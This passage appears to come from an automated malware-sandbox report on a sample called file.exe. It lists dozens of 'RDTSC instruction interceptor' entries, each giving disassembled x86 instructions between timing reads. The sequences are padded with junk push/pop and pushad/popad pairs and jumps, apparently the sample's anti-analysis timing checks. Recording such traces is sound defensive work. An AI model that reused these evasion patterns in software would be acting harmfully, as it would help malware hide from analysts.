                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE33B second address: 9EE345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE345 second address: 9EE349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE349 second address: 9EDC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c mov ebx, dword ptr [ebp+122D2BDDh] 0x00000012 mov bl, 35h 0x00000014 popad 0x00000015 push dword ptr [ebp+122D1211h] 0x0000001b jmp 00007EFD6CF3F37Fh 0x00000020 mov dword ptr [ebp+122D2EAEh], eax 0x00000026 call dword ptr [ebp+122D190Dh] 0x0000002c pushad 0x0000002d jmp 00007EFD6CF3F380h 0x00000032 pushad 0x00000033 jnp 00007EFD6CF3F380h 0x00000039 mov dword ptr [ebp+122D1B70h], eax 0x0000003f popad 0x00000040 xor eax, eax 0x00000042 cmc 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 mov dword ptr [ebp+122D1B70h], ecx 0x0000004d mov dword ptr [ebp+122D2A7Dh], eax 0x00000053 or dword ptr [ebp+122D1B70h], eax 0x00000059 mov esi, 0000003Ch 0x0000005e sub dword ptr [ebp+122D1B70h], edx 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 jp 00007EFD6CF3F37Ch 0x0000006e lodsw 0x00000070 mov dword ptr [ebp+122D3239h], edx 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a sub dword ptr [ebp+122D1B70h], edi 0x00000080 jmp 00007EFD6CF3F386h 0x00000085 mov ebx, dword ptr [esp+24h] 0x00000089 cld 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d push edi 0x0000008e pop edi 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E62E second address: B6E64D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD6CDBF8A5h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E64D second address: B6E653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E653 second address: B6E685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007EFD6CDBF89Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007EFD6CDBF8A5h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DE78 second address: B6DE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DE81 second address: B6DE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7003B second address: B70041 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70041 second address: B7005E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B701CD second address: B701D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFD6CF3F376h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70246 second address: B702FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007EFD6CDBF8BAh 0x00000010 nop 0x00000011 add ch, FFFFFF8Bh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007EFD6CDBF898h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov dx, bx 0x00000033 push 31E87FEAh 0x00000038 jmp 00007EFD6CDBF89Ch 0x0000003d xor dword ptr [esp], 31E87F6Ah 0x00000044 sub dword ptr [ebp+122D1B44h], esi 0x0000004a push 00000003h 0x0000004c jp 00007EFD6CDBF8A0h 0x00000052 pushad 0x00000053 mov esi, eax 0x00000055 xor eax, dword ptr [ebp+122D2C85h] 0x0000005b popad 0x0000005c push 00000000h 0x0000005e add esi, dword ptr [ebp+122D3B65h] 0x00000064 push 00000003h 0x00000066 mov esi, dword ptr [ebp+122D2BC9h] 0x0000006c call 00007EFD6CDBF899h 0x00000071 push ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B702FA second address: B702FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B702FE second address: B70302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70302 second address: B70314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007EFD6CF3F376h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70314 second address: B7031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7031A second address: B7031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7031F second address: B70357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jne 00007EFD6CDBF8B0h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edx 0x00000016 jnp 00007EFD6CDBF89Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70357 second address: B70364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70364 second address: B7036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7036F second address: B70373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70373 second address: B703B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 sub dword ptr [ebp+122D324Fh], ebx 0x0000000e lea ebx, dword ptr [ebp+12455EEDh] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007EFD6CDBF898h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B703B5 second address: B703BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B703BB second address: B703CD instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD6CDBF896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70481 second address: B704A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70572 second address: B705FC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD6CDBF898h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ecx 0x0000000f jmp 00007EFD6CDBF89Eh 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 push ecx 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop ecx 0x0000001c pushad 0x0000001d jne 00007EFD6CDBF896h 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 popad 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b jmp 00007EFD6CDBF8A4h 0x00000030 pop eax 0x00000031 jmp 00007EFD6CDBF8A7h 0x00000036 lea ebx, dword ptr [ebp+12455EF8h] 0x0000003c sub ecx, 4FC64DB0h 0x00000042 and cx, 5000h 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007EFD6CDBF8A4h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91819 second address: B91823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91823 second address: B91865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFD6CDBF8A1h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop eax 0x00000013 push ecx 0x00000014 jmp 00007EFD6CDBF89Fh 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007EFD6CDBF89Ch 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91865 second address: B9186B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61893 second address: B61899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61899 second address: B6189F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6189F second address: B618A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F6C8 second address: B8F6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F6CE second address: B8F6DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFD6CDBF896h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F81F second address: B8F823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F823 second address: B8F85F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007EFD6CDBF896h 0x00000009 jmp 00007EFD6CDBF8A9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFD6CDBF89Fh 0x00000018 push edi 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F85F second address: B8F86B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFD6CF3F376h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F86B second address: B8F86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FB68 second address: B8FB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FE60 second address: B8FE66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FE66 second address: B8FE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FFBE second address: B8FFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FFC2 second address: B8FFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007EFD6CF3F37Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B902B3 second address: B902BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007EFD6CDBF896h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B906A7 second address: B906B1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD6CF3F376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B906B1 second address: B906F8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFD6CDBF8B5h 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007EFD6CDBF896h 0x00000010 jmp 00007EFD6CDBF8A8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87AEB second address: B87AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87AEF second address: B87B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007EFD6CDBF8A8h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 jg 00007EFD6CDBF896h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90992 second address: B9099C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD6CF3F38Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9099C second address: B909B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A2h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B909B6 second address: B909BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B909BA second address: B909C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90F79 second address: B90F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90F7E second address: B90F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B910C5 second address: B910C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B910C9 second address: B910CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B910CF second address: B910D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91251 second address: B91255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91255 second address: B9125B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9125B second address: B9127D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD6CDBF8A7h 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B913C2 second address: B913D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007EFD6CF3F37Dh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B913D4 second address: B913DE instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD6CDBF8A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B913DE second address: B913E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97BFE second address: B97C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96331 second address: B96335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96335 second address: B96343 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD6CDBF896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96343 second address: B96347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9BE2D second address: B9BE37 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFD6CDBF896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9BE37 second address: B9BE41 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD6CF3F37Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4AB second address: B9C4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4C0 second address: B9C4C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4C8 second address: B9C4D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4D0 second address: B9C4D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4D6 second address: B9C4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4DF second address: B9C51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CF3F37Ch 0x00000009 js 00007EFD6CF3F376h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jc 00007EFD6CF3F376h 0x0000001a jbe 00007EFD6CF3F376h 0x00000020 popad 0x00000021 jmp 00007EFD6CF3F37Ch 0x00000026 js 00007EFD6CF3F382h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C51B second address: B9C521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D5F3 second address: B9D5F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D5F8 second address: B9D61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007EFD6CDBF8A9h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DA17 second address: B9DA1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DA1D second address: B9DA23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DD1C second address: B9DD41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD6CF3F37Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E2B6 second address: B9E2BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E38C second address: B9E390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E409 second address: B9E410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E698 second address: B9E69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E69C second address: B9E6D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007EFD6CDBF8A9h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E744 second address: B9E74B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E7D2 second address: B9E802 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007EFD6CDBF896h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub di, ECA9h 0x00000014 xchg eax, ebx 0x00000015 jmp 00007EFD6CDBF8A0h 0x0000001a push eax 0x0000001b push edi 0x0000001c pushad 0x0000001d js 00007EFD6CDBF896h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
